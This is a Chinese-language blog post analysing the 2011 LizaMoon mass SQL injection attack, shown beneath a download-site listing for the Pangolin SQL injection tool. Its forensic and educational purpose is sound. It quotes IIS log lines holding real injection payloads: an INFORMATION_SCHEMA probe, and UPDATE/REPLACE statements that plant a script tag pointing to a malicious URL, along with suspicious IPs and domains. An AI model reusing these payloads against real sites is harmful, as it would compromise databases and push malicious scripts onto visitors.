不要做網(wǎng)站裸奔的豬頭 LizaMoon SQL注入攻擊已經(jīng)影響38萬(wàn)個(gè)網(wǎng)頁(yè)

Pangolin(SQL注入-滲透測(cè)試工具)v2.5.2.975 綠色多語(yǔ)版

• 類型：瀏覽安全大�。�6.2M語(yǔ)言：多國(guó)語(yǔ)言[中文] 評(píng)分：2.0
• 標(biāo)簽：

立即下載

資安廠商Websense在3/29發(fā)布了一則消息，一個(gè)被命名為L(zhǎng)izaMoon的SQL Injection攻擊正在席卷全球，已有許多網(wǎng)站遭受攻擊，網(wǎng)頁(yè)內(nèi)容中被塞了lizamoon字串，疑似掛馬連結(jié)，透過(guò)Google查詢lizamoon. com關(guān)鍵詞，被稙入惡意連結(jié)的URL數(shù)在兩天內(nèi)由28,000個(gè)急速增加到380,000個(gè)(2011/03/31 22:00 UTC+8時(shí)的資料)，有如海嘯狂掃(Websense說(shuō):  it makes it one of the bigger mass-injection attacks we have ever seen.)， 甚至iTune網(wǎng)站也名列其中。

不過(guò)，依據(jù)分析iTune中出現(xiàn)的惡意連結(jié)已被HtmlEncode為<script不至產(chǎn)生危害，并且推 斷中鏢數(shù)據(jù)下載自其他信息源，并非iTune本身受害，而加上HtmlEncode的處置也深得Websense贊許。(HtmlEncode真的很重 要! 由ASP.NET 4特別為它提供更簡(jiǎn)潔的新語(yǔ)法就知道它被呼叫的頻率該有多高，如果你不知道為何它與資安有關(guān)，不妨看一下ASP.NET防駭指南)

httq: // lizamoon. com / ur . php這個(gè)URL目前是無(wú)效的(該不會(huì)因?yàn)楸惶�多植入連結(jié)網(wǎng)站DDoS打掛了吧? XD)，但網(wǎng)站是活的。在它曾經(jīng)有效的一段期間，ur.php會(huì)傳回一段Script將用戶導(dǎo)向一個(gè)著名的假冒防毒網(wǎng)站，不過(guò)該網(wǎng)站也掛點(diǎn)中。 Websense調(diào)查了lizamoon. com的底細(xì)，發(fā)現(xiàn)它是3/25才用假資料注冊(cè)的，換句話說(shuō)，這波攻擊只花了短短幾天就污染了超過(guò)38萬(wàn)個(gè)網(wǎng)址(以URL計(jì)，非網(wǎng)站數(shù))，而且開(kāi)始注入開(kāi) 始出現(xiàn)lizamoon以外的域名的Script連結(jié)網(wǎng)址。

目前網(wǎng)絡(luò)上找到的數(shù)據(jù)尚少，無(wú)從推斷太多攻擊細(xì)節(jié)，不過(guò)我在ASP.NET官方討論區(qū)的一個(gè)討論串倒是找到不少蛛絲馬跡...

My database was inserted a string like "</title><script src=http://lizamoon.com/ur.php></script>". Event(Even?) the username field in aspnet_users table. So now I can't login my website if I use asp.net security. Who know about this problem please tell me what happening with my database or my website.

由開(kāi)場(chǎng)白看來(lái)，連aspnet_users的username字段都被注入惡意script連結(jié)，非常像古早前看過(guò)的游擊式SQL Injection攻擊， 攻擊程序?qū)⑷�部SQL指令濃縮成一列，隨意嘗試連上有帶QueryString參數(shù)并夾帶攻擊用的SQL指令加在網(wǎng)址后方，一旦該網(wǎng)頁(yè)有SQL Injection漏洞，則附加于參數(shù)中的SQL指令就會(huì)被執(zhí)行，查詢SQL Server的sysobjects, syscolumns，列出所有的文字字段，并透過(guò)UPDATE指令在所有文字字段都插入惡意script連結(jié)，一旦這些字段被讀取顯示在前端，又未經(jīng) HtmlEncode轉(zhuǎn)換，網(wǎng)頁(yè)中就會(huì)包含<script src="惡意Script" />，所有連上該網(wǎng)站的訪客，都會(huì)被迫加載惡意Script執(zhí)行邪惡任務(wù)。相關(guān)的原理在游擊式SQL Injection攻擊一文中已有詳細(xì)解說(shuō)楚，這里不再贅述。

不過(guò)，更進(jìn)一步檢視討論串，倒有了不同的結(jié)論:

Same for us. We cleaned the code yesterday, and moments ago... the same. (會(huì)反復(fù)中鏢，表示攻擊程序不只一只? 或是程序會(huì)持續(xù)攻擊?) 

幾個(gè)可疑IP: 95.64.9.18(來(lái)自羅馬尼亞), 91.217.162.45(來(lái)自烏克蘭，著名的邪惡網(wǎng)絡(luò)) 

網(wǎng)友提供珍貴的IISLog(進(jìn)行入侵鑒識(shí)時(shí)，這是超重要的線索) 

2011-03-11 16:34:45 W3SVC1746246233 *MYSERVERIP* GET /dir/linkdetail.aspx id=11011+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+not+in+(SELECT+TOP+0+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))-- 80 - 91.217.162.45 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) 500 0 0 

Doc.asp?id=PU12731+update+gCategoriasHistoricoTiposDescripciones+set+Descripcion=REPLACE(cast(Descripcion+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ....省略, 用CHR(nn)一個(gè)字符一個(gè)字符組出</title><script src=httq:// lazemoon .com / ur . php></script>…%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- - 95.64.9.18 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) - 302 498 

2011-03-29 17:56:49 <<my server ip address>> GET /<<pagename>>.asp prod=MG0011'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ....省略, 用CHR(nn)一個(gè)字符一個(gè)字符組出</title><script src=httq:// lazemoon .com / ur . php></script>… %2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 80 - 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) 

由這些Log來(lái)看，惡意SQL會(huì)鎖定特定Table及字段，不像上回觀察用sysobjects, syscolumns+CURSOR亂槍打鳥(niǎo)，顯示本次攻擊并非打了就跑，會(huì)先掌握數(shù)據(jù)庫(kù)Schema的信息后再精準(zhǔn)下手，所以前后應(yīng)有多次存取(不知道為什么要選擇這種做法，我還是覺(jué)得游擊式的玩法比較有創(chuàng)意，唯一的缺點(diǎn)是Table、字段及數(shù)據(jù)很多時(shí)，執(zhí)行起來(lái)耗時(shí)較久) 

3/31起出現(xiàn)了非LizaMoon的網(wǎng)域用來(lái)掛ur.php (tadygus . com, verhoef – training. co. uk, t6ryt56 . info) ，顯示透過(guò)防火墻封鎖lizamoon. com也無(wú)法社絕使用者誤連惡意網(wǎng)站的可能。

雖然對(duì)LizaMoon SQL Injection充滿好奇，但依目前搜集到的資料就只能做出以上推測(cè)，如果有新的發(fā)展再做補(bǔ)充啰。

老話一句，大家千萬(wàn)不要把SQL Injection寫進(jìn)程序里變成害網(wǎng)站裸奔的豬頭呀! 看不懂? 請(qǐng)參見(jiàn)這里。